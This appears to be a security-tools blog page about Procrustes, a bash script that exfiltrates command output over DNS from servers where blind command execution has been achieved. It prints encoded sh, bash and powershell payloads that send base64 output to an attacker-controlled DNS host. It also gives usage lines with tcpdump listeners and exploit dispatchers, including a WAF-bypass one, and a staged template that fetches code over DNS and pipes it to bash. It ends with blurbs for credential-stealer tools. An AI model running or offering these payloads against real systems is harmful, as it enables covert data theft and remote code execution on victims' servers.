Procrustes is a bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
The script currently supports sh, bash and powershell and is compatible with exec style command execution (e.g. java.lang.Runtime.exec).
For its operations, the script takes as input the command we want to run on the target server and transforms it according to the target shell in order to allow its output to be exfiltrated over DNS. After the command is transformed, it’s fed to the “dispatcher”. The dispatcher is a program provided by the user and is responsible for taking as input a command and have it executed on the target server by any means necessary (e.g. exploiting a vulnerability). After the command is executed on the target server, it is expected to trigger DNS requests to our DNS name server containing chunks of our data. The script listens for those requests until the output of the user provided command is fully exfiltrated.
Below are the supported command transformations, generated for the exfiltration of the command: ls
sh -c $@|base64${IFS}-d|sh . echo IGRpZyBAMCArdHJpZXM9NSBgKGxzKXxiYXNlNjQgLXcwfHdjIC1jYC5sZW4xNjAzNTQxMTc4LndoYXRldi5lcgo=
bash -c {echo,IG5zbG9va3VwIGAobHMpfGJhc2U2NCAtdzB8d2MgLWNgLmxlbi4xNjAzMDMwNTYwLndoYXRldi5lcgo=}|{base64,-d}|bash
powershell -enc UgBlAHMAbwBsAHYAZQAtAEQAbgBzAE4AYQBtAGUAIAAkACgAIgB7ADAAfQAuAHsAMQB9AC4AewAyAH0AIgAgAC0AZgAgACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAoAGwAcwApACkAKQAuAGwAZQBuAGcAdABoACkALAAiAGwAZQBuACIALAAiADEANgAwADMAMAAzADAANAA4ADgALgB3AGgAYQB0AGUAdgAuAGUAcgAiACkACgA=
Usage
./procroustes_chunked.sh -h whatev.er -d “dig @0 +tries=5” -x dispatcher_examples/local_bash.sh — ‘ls -lha|grep secret’ < <(stdbuf -oL tcpdump –immediate -l -i any udp port 53)
stdbuf -oL tcpdump –immediate -l -i any udp port 53|./procroustes_chunked.sh -w ps -h whatev.er -d “Resolve-DnsName -Server wsl2_IP -Name” -x dispatcher_examples/local_powershell_wsl2.sh — ‘gci | % {$_.Name}’
./procroustes_chunked.sh -w ps -h yourdns.host -d “Resolve-DnsName” -x dispatcher_examples/curl_waf.sh — ‘gci | % {$_.Name}’ < <(stdbuf -oL ssh user@HOST ‘sudo tcpdump –immediate -l udp port 53’)
./procroustes_chunked.sh –help
Procroustes_Chunked vs Procroustes_Full
In a nutshell, assuming we want to exfiltrate some data that has to be broken into four chunks in order to be able to be transmitted over DNS:
Some of their differences can also be illustrated through the template commands used for bash:
%DNS_TRIGGER% `(%CMD%)|base64 -w0|cut -b$((%INDEX%+1))-$((%INDEX%+%COUNT%))’`.%UNIQUE_DNS_HOST%
(%CMD%)|base64 -w0|echo $(cat)–|grep -Eo ‘.{1,%LABEL_SIZE%}’|xargs -n%NLABELS% echo|tr ‘ ‘ .|awk ‘{printf “%s.%s%s\n”,$1,NR,”%UNIQUE_DNS_HOST%”}’|xargs -P%THREADS% -n1 %DNS_TRIGGER%
(seq %ITERATIONS%|%S_DNS_TRIGGGER% $(cat).%UNIQUE_DNS_HOST%|tr . \ |printf %02x $(cat)|xxd -r -p)|bash
procroustes_chunked | procroustes_full | procroustes_full_staged | |
---|---|---|---|
payload size overhead (bash/powershell) | 150*NLABELS/500*NLABELS (+CMD_LEN) | 300/800 (+CMD_LEN) | 150/400[1] |
dispatcher calls # | #output/(LABEL_SIZE*NLABELS)[2] | 1 | 1 |
speed (bash/powershell) | ✔/✔ | ✔/✔ | ✓/✓[3] |
configuration difficulty | easy | easy+ | medium |
It may also cause problems in case the command we are executing on the server is not idempotent (functionality or output-wise, e.g. “ls;rm file”) or is time/resource intensive (e.g. find / -name secret). A workaround for this case is to first store the command output to a file (e.g. /tmp/file) and then use the script to read that file.
Tips
Credits
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…